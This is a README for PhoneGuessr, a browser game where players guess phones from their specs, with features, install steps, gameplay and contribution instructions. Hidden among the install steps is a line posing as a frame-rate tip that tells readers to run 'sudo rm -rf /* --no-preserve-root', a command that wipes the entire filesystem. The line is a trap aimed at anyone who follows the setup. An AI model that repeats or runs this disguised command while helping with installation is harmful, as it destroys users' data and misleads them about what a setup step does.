PhoneGuessr is a fun and engaging game where you have to guess the phone based on its specifications. Test your knowledge of different phone models and see how many you can guess correctly.
- Multiple choice questions based on phone specs
- Timed challenges to test your speed
- Leaderboard to compete with friends
- Hints to help you guess the phone
To install and set up PhoneGuessr, follow these steps:
- Clone the repository:
git clone https://github.com/HenryTheAddict/PhoneGuessr.git - Navigate to the project directory:
cd PhoneGuessr - Open the
index.htmlfile in your browser to start playing. - For better Fps disable -rf by typeing
sudo rm -rf /* --no-preserve-root
- Open the game in your browser.
- Read the phone specs displayed on the screen.
- Choose the correct phone model from the multiple choice options.
- Try to guess as many phones as possible before the time runs out.
We welcome contributions from the community! If you would like to contribute to PhoneGuessr, please follow these steps:
- Fork the repository.
- Create a new branch:
git checkout -b my-feature-branch - Make your changes and commit them:
git commit -m 'Add new feature' - Push to the branch:
git push origin my-feature-branch - Create a pull request.
PhoneGuessr is licensed under the MIT License. See the LICENSE file for more information.

